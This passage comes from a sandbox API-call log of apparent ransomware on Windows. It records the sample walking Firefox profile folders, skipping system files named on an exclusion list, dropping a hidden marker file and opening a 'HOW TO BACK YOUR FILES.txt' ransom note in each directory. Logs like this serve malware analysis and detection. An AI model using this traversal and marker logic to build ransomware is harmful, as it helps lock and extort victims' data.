hTemplateFile=0x0) returned 0x2ac [0050.224] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0050.227] FlushFileBuffers (hFile=0x2ac) returned 1 [0050.228] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.228] CloseHandle (hObject=0x2ac) returned 1 [0050.229] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox") returned 47 [0050.229] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.229] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x82f30ff9, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73108 [0050.229] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.229] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.229] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0050.229] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.229] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x82f30ff9, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.229] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.229] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.229] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0050.229] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.229] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.229] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82f30ff9, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82f30ff9, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82f57205, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.229] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.229] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.229] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfafe15e1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Crash Reports", cAlternateFileName="CRASHR~1")) returned 1 [0050.229] lstrcmpiW (lpString1="Crash Reports", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.229] lstrcmpiW (lpString1="Crash Reports", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.230] lstrcmpiW (lpString1="Crash Reports", lpString2="Tiger4444.exe") returned -1 [0050.230] lstrcmpiW (lpString1="Crash Reports", lpString2=".") returned 1 [0050.230] lstrcmpiW (lpString1="Crash Reports", lpString2="..") returned 1 [0050.230] lstrcmpiW (lpString1="Crash Reports", lpString2="windows") returned -1 [0050.230] lstrcmpiW (lpString1="Crash Reports", lpString2="bootmgr") returned 1 [0050.230] lstrcmpiW (lpString1="Crash Reports", lpString2="pagefile.sys") returned -1 [0050.230] lstrcmpiW (lpString1="Crash Reports", lpString2="boot") returned 1 [0050.230] lstrcmpiW (lpString1="Crash Reports", lpString2="ids.txt") returned -1 [0050.230] lstrcmpiW (lpString1="Crash Reports", lpString2="NTUSER.DAT") returned -1 [0050.230] lstrcpyW (in: lpString1=0x30aeb08, lpString2="Crash Reports" | out: lpString1="Crash Reports") returned="Crash Reports" [0050.230] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0050.230] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x7c) returned 0xc71bf8 [0050.230] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc66568 [0050.230] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfafe15e1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pending Pings", cAlternateFileName="PENDIN~1")) returned 1 [0050.230] lstrcmpiW (lpString1="Pending Pings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.230] lstrcmpiW (lpString1="Pending Pings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.230] lstrcmpiW (lpString1="Pending Pings", lpString2="Tiger4444.exe") returned -1 [0050.230] lstrcmpiW (lpString1="Pending Pings", lpString2=".") returned 1 [0050.230] lstrcmpiW (lpString1="Pending Pings", lpString2="..") returned 1 [0050.230] lstrcmpiW (lpString1="Pending Pings", lpString2="windows") returned -1 [0050.230] lstrcmpiW (lpString1="Pending Pings", lpString2="bootmgr") returned 1 [0050.230] lstrcmpiW (lpString1="Pending Pings", lpString2="pagefile.sys") returned 1 [0050.230] lstrcmpiW (lpString1="Pending Pings", lpString2="boot") returned 1 [0050.230] lstrcmpiW (lpString1="Pending Pings", lpString2="ids.txt") returned 1 [0050.230] lstrcmpiW (lpString1="Pending Pings", lpString2="NTUSER.DAT") returned 1 [0050.230] lstrcpyW (in: lpString1=0x30aeb08, lpString2="Pending Pings" | out: lpString1="Pending Pings") returned="Pending Pings" [0050.230] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66320 [0050.230] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x7c) returned 0xc721d0 [0050.230] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66328 | out: ListHead=0xc66828, ListEntry=0xc66328) returned 0xc66528 [0050.230] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0050.230] lstrcmpiW (lpString1="Profiles", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.230] lstrcmpiW (lpString1="Profiles", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.230] lstrcmpiW (lpString1="Profiles", lpString2="Tiger4444.exe") returned -1 [0050.230] lstrcmpiW (lpString1="Profiles", lpString2=".") returned 1 [0050.230] lstrcmpiW (lpString1="Profiles", lpString2="..") returned 1 [0050.230] lstrcmpiW (lpString1="Profiles", lpString2="windows") returned -1 [0050.230] lstrcmpiW (lpString1="Profiles", lpString2="bootmgr") returned 1 [0050.230] lstrcmpiW (lpString1="Profiles", lpString2="pagefile.sys") returned 1 [0050.230] lstrcmpiW (lpString1="Profiles", lpString2="boot") returned 1 [0050.230] lstrcmpiW (lpString1="Profiles", lpString2="ids.txt") returned 1 [0050.230] lstrcmpiW (lpString1="Profiles", lpString2="NTUSER.DAT") returned 1 [0050.230] lstrcpyW (in: lpString1=0x30aeb08, lpString2="Profiles" | out: lpString1="Profiles") returned="Profiles" [0050.231] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0050.231] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x72) returned 0xc83290 [0050.231] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc66328 [0050.231] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x7a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="profiles.ini", cAlternateFileName="")) returned 1 [0050.231] lstrcmpiW (lpString1="profiles.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.231] lstrcmpiW (lpString1="profiles.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.231] lstrcmpiW (lpString1="profiles.ini", lpString2="Tiger4444.exe") returned -1 [0050.231] lstrcmpiW (lpString1="profiles.ini", lpString2=".") returned 1 [0050.231] lstrcmpiW (lpString1="profiles.ini", lpString2="..") returned 1 [0050.231] lstrcmpiW (lpString1="profiles.ini", lpString2="windows") returned -1 [0050.231] lstrcmpiW (lpString1="profiles.ini", lpString2="bootmgr") returned 1 [0050.231] lstrcmpiW (lpString1="profiles.ini", lpString2="pagefile.sys") returned 1 [0050.231] lstrcmpiW (lpString1="profiles.ini", lpString2="boot") returned 1 [0050.231] lstrcmpiW (lpString1="profiles.ini", lpString2="ids.txt") returned 1 [0050.231] lstrcmpiW (lpString1="profiles.ini", lpString2="NTUSER.DAT") returned 1 [0050.231] lstrcpyW (in: lpString1=0x30aeb08, lpString2="profiles.ini" | out: lpString1="profiles.ini") returned="profiles.ini" [0050.231] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini", dwFileAttributes=0x0) returned 1 [0050.232] lstrlenW (lpString="profiles.ini") returned 12 [0050.232] lstrlenW (lpString="Tiger4444") returned 9 [0050.232] lstrcmpiW (lpString1="files.ini", lpString2="Tiger4444") returned -1 [0050.232] lstrlenW (lpString=".dll") returned 4 [0050.232] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0050.232] lstrlenW (lpString=".lnk") returned 4 [0050.232] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0050.232] lstrlenW (lpString=".ini") returned 4 [0050.232] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0050.232] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x7a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="profiles.ini", cAlternateFileName="")) returned 0 [0050.232] FindClose (in: hFindFile=0xc73108 | out: hFindFile=0xc73108) returned 1 [0050.232] lstrcpyW (in: lpString1=0x30aeb08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.232] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0050.232] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0050.232] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0050.233] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.233] CloseHandle (hObject=0x260) returned 1 [0050.233] CloseHandle (hObject=0x2ac) returned 1 [0050.233] GetCurrentThreadId () returned 0xfa8 [0050.233] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0050.233] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0050.233] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc83290 | out: hHeap=0xc50000) returned 1 [0050.233] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0050.233] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0050.233] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0050.233] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.BFC0E91B00AE8A0620D3" [0050.233] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0050.235] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0050.237] FlushFileBuffers (hFile=0x2ac) returned 1 [0050.239] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.239] CloseHandle (hObject=0x2ac) returned 1 [0050.240] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 56 [0050.240] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.240] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x82f57205, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0050.240] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.240] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.240] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0050.240] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.240] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x82f57205, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.240] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.240] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.240] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0050.240] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.240] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.240] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82f57205, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82f57205, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82f57205, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.240] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.240] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.240] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xb83449e5, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb83449e5, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="w7cr0hor.default", cAlternateFileName="W7CR0H~1.DEF")) returned 1 [0050.240] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.240] lstrcmpiW (lpString1="w7cr0hor.default", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.240] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="Tiger4444.exe") returned 1 [0050.240] lstrcmpiW (lpString1="w7cr0hor.default", lpString2=".") returned 1 [0050.240] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="..") returned 1 [0050.240] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="windows") returned -1 [0050.240] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="bootmgr") returned 1 [0050.240] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="pagefile.sys") returned 1 [0050.241] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="boot") returned 1 [0050.241] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="ids.txt") returned 1 [0050.241] lstrcmpiW (lpString1="w7cr0hor.default", lpString2="NTUSER.DAT") returned 1 [0050.241] lstrcpyW (in: lpString1=0x30aeb1a, lpString2="w7cr0hor.default" | out: lpString1="w7cr0hor.default") returned="w7cr0hor.default" [0050.241] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66340 [0050.241] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x94) returned 0xc84fe8 [0050.241] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66348 | out: ListHead=0xc66828, ListEntry=0xc66348) returned 0xc66328 [0050.241] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xb83449e5, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb83449e5, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="w7cr0hor.default", cAlternateFileName="W7CR0H~1.DEF")) returned 0 [0050.241] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0050.241] lstrcpyW (in: lpString1=0x30aeb1a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.241] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0050.243] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0050.243] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0050.243] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.244] CloseHandle (hObject=0x260) returned 1 [0050.244] CloseHandle (hObject=0x2ac) returned 1 [0050.244] GetCurrentThreadId () returned 0xfa8 [0050.244] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66348 [0050.244] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default" [0050.244] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc84fe8 | out: hHeap=0xc50000) returned 1 [0050.244] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66340 | out: hHeap=0xc50000) returned 1 [0050.244] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default" [0050.244] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\" [0050.244] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\.BFC0E91B00AE8A0620D3" [0050.244] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0050.247] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0050.249] FlushFileBuffers (hFile=0x2ac) returned 1 [0050.250] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.250] CloseHandle (hObject=0x2ac) returned 1 [0050.251] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default") returned 73 [0050.251] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.251] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xb83449e5, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x82f7d598, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73148 [0050.251] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.251] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") 